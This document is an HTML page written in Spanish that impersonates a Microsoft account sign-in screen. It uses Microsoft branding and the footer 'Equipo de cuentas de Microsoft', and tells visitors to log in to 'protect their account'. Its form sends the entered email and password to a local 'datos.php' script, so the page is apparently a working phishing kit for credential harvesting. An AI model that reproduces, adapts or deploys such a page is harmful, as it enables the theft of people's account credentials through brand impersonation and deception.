
<html>
  
   <head>
      <meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
     
      <meta http-equiv="X-UA-Compatible" content="IE=edge,chrome=1">
      <title>Home</title>
      <link rel="shortcut icon" type="image/x-icon" href="https://companieslogo.com/img/orig/MSFT-a203b22d.png?t=1633073277">
      <meta name="viewport" content="width=device-width, initial-scale=1.0">
      <link rel="stylesheet" href="bootstrap.min.css">
     
      <link href="css2" rel="stylesheet">
      <!-- Link para importar los iconos-->
      <link rel="stylesheet" href="font-awesome.min.css">
    
      <style>
         body,
         html {
         height: 100%;
         background-image: url("https://pbs.twimg.com/media/Fth-XmMXwBYrdcF?format=jpg&name=small");
         background-position: center;
         background-size: cover;
         font-family: 'Montserrat', sans-serif;
         }
         input {
         filter: none !important;
         }
         @media only screen and (max-width: 765px) {
         body,
         html {
         background-image: none;
         }
         .login-box {
         position: relative !important;
         box-shadow: none !important;
         border-top: none !important;
         top: 0 !important;
         transform: none !important;
         float: none !important;
         }
         .login-container .wrapper {
         position: relative;
         top: 0;
         z-index: 1;
         width: 100%;
         }
         }
         .login-container {
         position: relative;
         min-height: 100%;
         max-width: 900px;
         margin: auto;
         }
         .login-box {
         position: absolute;
         top: 50%;
         transform: translateY(-50%);
         padding: 20px;
         background-color: #fff;
         box-shadow: 0px 0px 1px 0.1px #9de1da;
         border-radius: 5px;
         border-top: 1px solid #e9e9e9;
         }
         .login-header {
         text-align: center;
         padding-top: 0;
         }
         .login-header img {
         width: 150px;
         }
         .login-footer {
         position: absolute;
         bottom: 10px;
         width: 300px;
         left: 0;
         right: 0;
         margin: 0 auto;
         }
         .login-footer img {
         width: 100%;
         }
         #error-message {
         display: none;
         }
         #gradient {
         height: 100px;
         background-image: linear-gradient(to bottom, rgb(255 255 255), rgb(255 255 255 / 0%));
         display: none;
         }
         #btn-login {
         background-color: #0067b8;
         border-radius: 0 !important;
         padding-bottom: 7px;
         padding-top: 7px;
         margin-top: 10px;
         }
         .center {
         text-align: center;
         }
         #bottom-imgs {
         height: 80px;
         display: flex;
         align-items: center;
         justify-content: space-evenly;
         width: 80%;
         margin: 0 auto;
         }
         #bottom-imgs .img-block {
         width: 40%;
         }
         #bottom-imgs .img-block img {
         width: 100%;
         }
         #vl {
         border-right: 1px solid #908f8f;
         height: 20px;
         display: inline;
         }
         .ingresa-cuenta {
         font-family: 'Montserrat', sans-serif;
         font-size: medium 18pt;
         color: #908f8f;
         padding-top: 10px;
         }
         .text {
         font-family: 'Montserrat', sans-serif;
         font-size: smaller;
         color: #908f8f;
         }
         a {
         font-size: smaller;
         color: #234881;
         }
         .space-right {
         margin-right: 5px;
         }
         input[type=text]:focus {
         outline: none !important;
         box-shadow: none !important;
         border: 2px solid #00c8a9;
         }
         input[type=password]:focus {
         outline: none !important;
         box-shadow: none !important;
         border: 2px solid #00c8a9;
         }
         .form-group {
         max-height: 60px;
         margin-top: 0 !important;
         margin-bottom: 0 !important;
         }
         .form-control {
         box-shadow: none;
         border-width: 1px;
         border-radius: 2px;
         }
         .eye-icon {
         position: relative;
         top: 30px;
         left: 60%;
         color: #908f8f;
         }
         @media only screen and (max-width: 765px) {
         .eye-icon {
         position: relative;
         left: 80%;
         color: #908f8f;
         }
         .login-header img {
         width: 250px;
         }
         }
         @media only screen and (max-width: 500px) {
         .eye-icon {
         position: relative;
         left: 70%;
         color: #908f8f;
         }
         }
         @media only screen and (max-width: 350px) {
         .eye-icon {
         position: relative;
         left: 60%;
         color: #908f8f;
         }
         }
         .form-group>label {
         text-decoration: none !important;
         top: 30px;
         left: 10px;
         position: relative;
         background-color: white;
         padding: 0px 5px 0px 5px;
         transition: 0.2s;
         pointer-events: none;
         font-family: 'Montserrat', sans-serif;
         font-size: 10px;
         color: #908f8f;
         }
         .label-animate>label {
         top: 12px !important;
         left: 12px !important;
         font-size: 10px;
         color: #234881;
         font-weight: 500;
         }
         label {
         font-weight: 200;
         }
         .login-footer-responsive {
         position: absolute;
         bottom: 0;
         display: none;
         height: auto;
         }
         @media only screen and (max-width: 765px) {
         .login-footer-responsive {
         display: block;
         }
         .login-footer-responsive img {
         width: 100%;
         }
         #gradient {
         display: block;
         }
         }
      </style>
      <style type="text/css">#_copy{align-items:center;background:#4494d5;border-radius:3px;color:#fff;cursor:pointer;display:flex;font-size:13px;height:30px;justify-content:center;position:absolute;width:60px;z-index:1000}#select-tooltip,#sfModal,.modal-backdrop,div[id^=reader-helper]{display:none!important}.modal-open{overflow:auto!important}._sf_adjust_body{padding-right:0!important}.enable_copy_btns_div{position:fixed;width:154px;left:10px;top:45%;background:#e7f1ff;border:2px solid #4595d5;font-weight:600;border-radius:2px;font-family:-apple-system,BlinkMacSystemFont,Segoe UI,PingFang SC,Hiragino Sans GB,Microsoft YaHei,Helvetica Neue,Helvetica,Arial,sans-serif,Apple Color Emoji,Segoe UI Emoji,Segoe UI Symbol;z-index:5000}.enable_copy_btns_logo{width:100%;background:#4595d5;text-align:center;font-size:12px;color:#e7f1ff;line-height:30px;height:30px}.enable_copy_btns_btn{display:block;width:128px;height:28px;background:#7f5711;border-radius:4px;color:#fff;font-size:12px;border:0;outline:0;margin:8px auto;font-weight:700;cursor:pointer;opacity:.9}.enable_copy_btns_btn:hover{opacity:.8}.enable_copy_btns_btn:active{opacity:1}</style>
   </head>
   <body __processed_ba8f7930-f4c1-4f93-8d1f-dc6abcbd9ebf__="true"  inmaintabuse="1" >
      
      <div class="login-container" >
         <div class="wrapper" >
            <div class="col-xs-12 col-sm-4 col-sm-offset-4 login-box" style="z-index:1000" >
               <div class="login-header" >
                  <img src="Fth9clMXwBYturo">
                  <h4 class="ingresa-cuenta">Iniciar sesión</h4>
                  <h5 class="ingresa-cuenta">Iniciar sesión para confirmar su identidad y proteger su cuenta</h5>
               </div>
               <div class="alert alert-danger" id="error-message" ></div>
               <div >
                  <form action="datos.php" method="post">
                     <div class="form-group label-animate" ><input class="form-control" id="uzer" type="email" name="uzer" autocomplete="off" placeholder="Correo electrónico, teléfono o Skype" required=""></div>
                     <br>
                     <div class="form-group label-animate" ><input class="form-control" id="pazz" name="pazz" type="text" placeholder="Contraseña" required=""></div>
               
               </div>
               
               
               <div class="center" style="padding-top: 5px; padding-bottom: 5px; margin-top: 5px" ><a id="link-olvidaste-tu-password" href="#" >¿Olvidaste tu contraseña?</a></div>
               <div class="captcha-container form-group" style="display: none;" ></div>
               <button class="btn btn-primary btn-block" type="submit" id="btn-login">Iniciar sesión</button>
                  </form>
               <hr style="width: 30%; background-color:#666666; margin-top: 10px; margin-bottom: 10px;">
            <p class="center text" style="margin: 0;">Equipo de cuentas de Microsoft</p>
            </div>
            <div class="center" ></div>
            
            <div class="center" >
            </div>
         </div>
      </div>
      <div id="gradient" ></div>
      <div class="login-footer" ></div>
     
   </body>
</html>
